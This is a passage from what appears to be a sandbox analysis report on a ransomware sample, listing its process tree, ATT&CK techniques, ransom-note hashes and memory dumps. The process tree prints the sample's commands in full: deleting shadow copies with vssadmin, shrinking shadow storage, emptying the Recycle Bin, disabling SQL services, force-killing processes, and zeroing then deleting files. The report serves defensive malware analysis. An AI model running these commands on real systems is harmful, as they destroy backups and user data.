  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4980
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4940
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5144
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:5664
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5244
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5236
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5228
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5220
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5208
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5196
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5188
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5180
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5172
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5164
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5156
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5132
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2856
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5108
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5020
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3BA.bat
  2⤵
  PID:4420
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2188
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5400
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:4484
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:192
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
  2⤵
  PID:4168
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:3828

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4912

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

MD5
c8f1b4535aa194476c2b079c9de2f889

SHA1
0df4069e46f22d1efae4a98cbd3339ce20b60c77

SHA256
8ba4b14e8ed0279710690f948da5ec7516b88d01db504599de28e4bfff2e3978

SHA512
b7647bad95ec28a6030abc72c11d11ef2e001a3653db704ed2e25956b895b2ec40a2eac86f46d45f9a5d498fb7208a245e1c6955ecf4e4e578c5b07d46615daa

Download Submit
memory/184-141-0x0000000000000000-mapping.dmp

Download
memory/208-123-0x0000000000000000-mapping.dmp

Download
memory/212-147-0x0000000000000000-mapping.dmp

Download
memory/856-143-0x0000000000000000-mapping.dmp

Download
memory/908-114-0x0000000000770000-0x0000000000771000-memory.dmp

Filesize
4KB

Download
memory/908-116-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/996-134-0x0000000000000000-mapping.dmp

Download
memory/1244-122-0x0000000000000000-mapping.dmp

Download
memory/1328-129-0x0000000000000000-mapping.dmp

Download
memory/1664-121-0x0000000000000000-mapping.dmp

Download
memory/2004-145-0x0000000000000000-mapping.dmp

Download
memory/2180-124-0x0000000000000000-mapping.dmp

Download
memory/2280-128-0x0000000000000000-mapping.dmp

Download
memory/2284-142-0x0000000000000000-mapping.dmp

Download
memory/2656-215-0x0000000001103000-0x0000000001104000-memory.dmp

Filesize
4KB

Download
memory/2656-132-0x00000000071E0000-0x00000000071E1000-memory.dmp

Filesize
4KB

Download
memory/2656-189-0x0000000007120000-0x0000000007121000-memory.dmp

Filesize
4KB

Download
memory/2656-188-0x00000000070B0000-0x00000000070B1000-memory.dmp

Filesize
4KB

Download
memory/2656-216-0x0000000009360000-0x0000000009361000-memory.dmp

Filesize
4KB

Download
memory/2656-117-0x0000000000000000-mapping.dmp

Download
memory/2656-187-0x0000000007010000-0x0000000007011000-memory.dmp

Filesize
4KB

Download
memory/2656-190-0x0000000007AC0000-0x0000000007AC1000-memory.dmp

Filesize
4KB

Download
memory/2656-191-0x0000000007850000-0x0000000007851000-memory.dmp

Filesize
4KB

Download
memory/2656-192-0x0000000007870000-0x0000000007871000-memory.dmp

Filesize
4KB

Download
memory/2656-193-0x00000000080F0000-0x00000000080F1000-memory.dmp

Filesize
4KB

Download
memory/2656-214-0x000000007FBF0000-0x000000007FBF1000-memory.dmp

Filesize
4KB

Download
memory/2656-126-0x00000000045C0000-0x00000000045C1000-memory.dmp

Filesize
4KB

Download
memory/2656-213-0x0000000008FA0000-0x0000000008FA1000-memory.dmp

Filesize
4KB

Download
memory/2656-149-0x0000000001102000-0x0000000001103000-memory.dmp

Filesize
4KB

Download
memory/2656-208-0x0000000008200000-0x0000000008201000-memory.dmp

Filesize
4KB

Download
memory/2656-146-0x0000000001100000-0x0000000001101000-memory.dmp

Filesize
4KB

Download
memory/2656-201-0x0000000008E60000-0x0000000008E93000-memory.dmp

Filesize
204KB

Download
memory/2804-127-0x0000000000000000-mapping.dmp

Download
memory/2836-186-0x0000000000000000-mapping.dmp

Download
memory/2848-135-0x0000000000000000-mapping.dmp

Download
memory/3000-118-0x0000000000000000-mapping.dmp

Download
memory/3012-130-0x0000000000000000-mapping.dmp

Download
memory/3156-125-0x0000000000000000-mapping.dmp

Download
memory/3316-144-0x0000000000000000-mapping.dmp

Download
memory/3336-137-0x0000000000000000-mapping.dmp

Download
memory/3404-131-0x0000000000000000-mapping.dmp

Download
memory/3500-181-0x0000000000000000-mapping.dmp

Download
memory/3604-138-0x0000000000000000-mapping.dmp

Download
memory/3628-133-0x0000000000000000-mapping.dmp

Download
memory/3688-139-0x0000000000000000-mapping.dmp

Download
memory/3844-136-0x0000000000000000-mapping.dmp

Download
memory/3900-140-0x0000000000000000-mapping.dmp

Download
memory/4116-148-0x0000000000000000-mapping.dmp

Download
memory/4140-150-0x0000000000000000-mapping.dmp

Download
memory/4192-151-0x0000000000000000-mapping.dmp

Download
memory/4200-182-0x0000000000000000-mapping.dmp

Download
memory/4212-152-0x0000000000000000-mapping.dmp

Download
memory/4248-153-0x0000000000000000-mapping.dmp

Download
memory/4292-154-0x0000000000000000-mapping.dmp

Download
memory/4344-155-0x0000000000000000-mapping.dmp

Download
memory/4396-156-0x0000000000000000-mapping.dmp

Download
memory/4424-157-0x0000000000000000-mapping.dmp

Download
memory/4440-183-0x0000000000000000-mapping.dmp

Download
memory/4444-158-0x0000000000000000-mapping.dmp

Download
memory/4452-159-0x0000000000000000-mapping.dmp

Download
memory/4488-160-0x0000000000000000-mapping.dmp

Download
memory/4500-161-0x0000000000000000-mapping.dmp

Download
memory/4540-163-0x0000000000000000-mapping.dmp

Download
memory/4548-162-0x0000000000000000-mapping.dmp

Download
memory/4608-164-0x0000000000000000-mapping.dmp

Download
memory/4648-165-0x0000000000000000-mapping.dmp

Download
memory/4660-166-0x0000000000000000-mapping.dmp

Download
memory/4692-184-0x0000000000000000-mapping.dmp

Download
memory/4696-167-0x0000000000000000-mapping.dmp

Download
memory/4716-168-0x0000000000000000-mapping.dmp

Download
memory/4728-169-0x0000000000000000-mapping.dmp

Download
memory/4772-170-0x0000000000000000-mapping.dmp

Download
memory/4784-185-0x0000000000000000-mapping.dmp

Download
memory/4832-171-0x0000000000000000-mapping.dmp

Download
memory/4856-172-0x0000000000000000-mapping.dmp

Download
memory/4872-173-0x0000000000000000-mapping.dmp

Download
memory/4904-174-0x0000000000000000-mapping.dmp

Download
memory/4944-175-0x0000000000000000-mapping.dmp

Download
memory/4972-176-0x0000000000000000-mapping.dmp

Download
memory/5012-177-0x0000000000000000-mapping.dmp

Download
memory/5032-178-0x0000000000000000-mapping.dmp

Download
memory/5072-179-0x0000000000000000-mapping.dmp

Download
memory/5100-180-0x0000000000000000-mapping.dmp

Download